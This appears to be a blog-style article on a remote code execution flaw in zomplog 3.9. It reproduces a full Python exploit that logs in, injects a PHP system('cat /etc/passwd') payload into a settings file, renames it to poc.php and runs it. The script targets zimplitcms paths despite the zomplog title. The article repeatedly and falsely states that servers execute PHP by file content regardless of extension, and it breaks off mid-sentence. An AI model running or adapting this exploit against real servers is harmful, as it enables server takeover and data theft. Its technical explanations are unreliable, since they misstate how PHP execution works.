zomplog 3.9 - Remote Code Execution (RCE)

zomplog 3.9 – Remote Code Execution (RCE) Vulnerability: A Deep Dive into a Critical PHP-Based Web Application Flaw

On July 22, 2023, cybersecurity researcher Mirabbas Ağalarov uncovered a critical Remote Code Execution (RCE) vulnerability in zomplog 3.9, a PHP-based web application hosted at http://zomp.nl/zomplog/. This flaw enables attackers to execute arbitrary system commands on the server, potentially leading to full system compromise. The vulnerability arises from improper handling of user-supplied input during file configuration updates, exposing a dangerous path for malicious payloads.

Understanding the Vulnerability: How RCE Works in zomplog 3.9

The core issue lies in the saveE action endpoint, which allows authenticated users to save configuration data into a JavaScript file named Zsettings.js. The application processes this input without proper sanitization or validation, permitting the inclusion of PHP code directly within the file content. This is particularly dangerous because the file is later accessed via a web server, effectively turning it into a web shell.

When an attacker submits a payload containing <?php echo system('cat /etc/passwd'); ?> as part of the file content, the server interprets the PHP code when the file is accessed — even if the file is renamed to poc.php. This bypasses typical file extension checks, exploiting the fact that PHP is executed based on the file’s content, not its extension.

Exploitation Workflow: Step-by-Step Breakdown

The exploit leverages a multi-stage attack sequence, which includes authentication, file injection, file renaming, and execution. Here’s how it unfolds:

#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"

Explanation: This script begins by gathering user credentials. The login URL uses a POST request with form data, including language preference, username, password, and a submit button. The attacker must first authenticate to gain access to the configuration interface.

#login 
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
 'Cookie' : 'ZsessionLang=en',
 'Content-Type' : 'application/x-www-form-urlencoded',
 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
 }
login_req=session.post(login_url,headers=headers,data=login_data)

if login_req.status_code == 200:
 print('Login OK')
else:
 print('Login promlem.')
 exit()

Explanation: The session object ensures persistent cookies (like ZsessionLang=en) are maintained across requests. The login attempt uses standard form encoding. Successful authentication is confirmed by a 200 OK response.

#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
 'Content-Type' : 'application/x-www-form-urlencoded',
 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
 }
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

Explanation: The payload is carefully crafted to inject PHP code into the Zsettings.js file. The html parameter contains the malicious content, encoded using URL encoding to bypass detection. The injected PHP code executes system('cat /etc/passwd'), which outputs the system password file. This demonstrates full RCE capability.

#rename
rename_req=session.get(rename_url)

Explanation: After the file is saved, the attacker uses the rename action to change the file name from Zsettings.js to poc.php. This step is critical because it allows the file to be executed as a PHP script by the web server, even if the original file was named with a non-PHP extension.

#poc
poc_req=session.get(poc_url)
print(poc_req.text)

Explanation: Finally, the attacker retrieves the renamed file via poc.php. The server executes the embedded PHP code, returning the output of cat /etc/passwd — proving successful RCE.

Technical Analysis: Why This is a Critical Flaw

Attack Vector	Impact	Exploitability
Authenticated File Injection	Full RCE, data exfiltration, server takeover	High (requires login, but no complex setup)
Missing Input Sanitization	Code execution via user-controlled file content	High (no filtering of PHP tags)
File Extension Bypass	PHP execution regardless of file extension	Medium (requires renaming, but predictable)

Key Insight: The vulnerability exploits a common design flaw — trust in user input without validation. Even though the application uses a saveE action for configuration, it fails to filter or escape PHP code, allowing attackers to craft payloads that execute directly on the server.

Security Recommendations and Mitigations

• Input Sanitization: Any user-provided content should be filtered to remove PHP tags (<?php, <?>, system(), etc.) before being written to files.
• File Extension Validation: Only allow files with known safe extensions (e.g., .js, .json) and block execution of files with .php unless explicitly approved.
• File Access Controls: Restrict access to configuration files via web server rules, such as denying execution of files in the config directory.
• Regular Audits: Conduct code reviews and penetration testing to identify similar injection points in file-based configuration systems.

Expert Tip: Never assume that a file with a non-PHP extension is safe. Web servers execute code based on content, not extension. Always enforce strict content filtering and execution controls.

Real-World Implications

zomplog 3.9 is used for managing web content and settings in small to medium-sized websites. If deployed in production environments, this RCE flaw could lead to:

• Server compromise:</